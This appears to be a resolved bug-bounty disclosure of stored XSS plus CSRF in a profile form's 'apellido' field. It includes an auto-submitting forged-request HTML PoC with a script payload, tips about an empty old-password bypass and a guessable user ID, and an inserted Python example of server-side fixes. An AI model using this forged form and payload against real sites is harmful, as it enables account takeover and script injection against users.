Stored XSS + CSRF in "apellido" value
Medium
Vulnerability Details
## Summary:
Hi team,
## Steps To Reproduce:
This is my CSRF POC:
```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="██████" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="nombre" value="aaaaaaaaaaaaaaaa" />
      <input type="hidden" name="apellido" value="<script>alert()</script>" />
      <input type="hidden" name="email" value="weqwad@intigriti.me" />
      <input type="hidden" name="rut" value="" />
      <input type="hidden" name="idProvincia" value="15" />
      <input type="hidden" name="idLocalidad" value="0" />
      <input type="hidden" name="optin[usuario_info_miroyalcanin]" value="no" />
      <input type="hidden" name="optin[usuario_info_miroyalcanin]" value="si" />
      <input type="hidden" name="optin[usuario_info_marspetcare]" value="no" />
      <input type="hidden" name="optin[usuario_info_marspetcare]" value="si" />
      <input type="hidden" name="optin[usuario_investigaciones]" value="no" />
      <input type="hidden" name="optin[usuario_investigaciones]" value="si" />
      <input type="hidden" name="optin[usuario_info_perros]" value="no" />
      <input type="hidden" name="optin[usuario_info_perros]" value="si" />
      <input type="hidden" name="optin[usuario_info_gatos]" value="no" />
      <input type="hidden" name="optin[usuario_info_gatos]" value="si" />
      <input type="hidden" name="switch_pass" value="off" />
      <input type="hidden" name="ck_oldpass" value="" />
      <input type="hidden" name="oldpass" value="" />
      <input type="hidden" name="clave" value="" />
      <input type="hidden" name="clave2" value="" />
      <input type="hidden" name="idUsuario" value="91737" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```
### The "oldpass" value can be empty to bypass :))
### The required "idUsuario" value can be guessed!!!
### Impact:
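The server-side checks that close the three weaknesses in this report, as an added example written for this page (it is not the program's code nor the reporter's PoC). Field names are taken from the PoC form above; the session layout, the `csrf_token` field and the `verify_password` helper are assumptions.

```python
import hmac
import html
import secrets

# Constructed copy of the fields sent by the PoC form above (only those the checks use).
POC_FORM = {
    "nombre": "aaaaaaaaaaaaaaaa",
    "apellido": "<script>alert()</script>",
    "email": "weqwad@intigriti.me",
    "switch_pass": "off",
    "oldpass": "",
    "clave": "",
    "clave2": "",
    "idUsuario": "91737",
}


def new_csrf_token():
    """Per-session token to embed as a hidden field in the legitimate form (assumed design)."""
    return secrets.token_urlsafe(32)


def check_profile_update(session, form, verify_password):
    """Return the reasons this profile-update POST must be rejected (empty list = accept).

    session: dict with 'user_id' and 'csrf_token' held server-side (assumed layout).
    verify_password(user_id, candidate) -> bool is an assumed helper.
    """
    reasons = []
    # CSRF: a cross-site form cannot know the session token, so require a matching one.
    token = form.get("csrf_token", "")
    if not token or not hmac.compare_digest(token, session["csrf_token"]):
        reasons.append("missing or invalid CSRF token")
    # idUsuario is client-supplied and guessable: bind the update to the session user.
    if form.get("idUsuario") != str(session["user_id"]):
        reasons.append("idUsuario does not match authenticated user")
    # Password change: an empty oldpass must fail the check, not bypass it.
    wants_change = form.get("switch_pass") == "on" or form.get("clave") or form.get("clave2")
    if wants_change:
        old = form.get("oldpass", "")
        if not old or not verify_password(session["user_id"], old):
            reasons.append("old password missing or incorrect")
        if form.get("clave") != form.get("clave2"):
            reasons.append("new passwords do not match")
    return reasons


def render_apellido(value):
    """HTML-encode a stored 'apellido' at output time so <script> renders as text."""
    return html.escape(value, quote=True)
```

Run against `POC_FORM`, the request is rejected on the CSRF check alone, and the encoded `apellido` no longer executes when the profile is displayed.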
Account Takeover
Report Stats
- Report ID: 2037234
- State: Closed
- Substate: resolved
- Upvotes: 8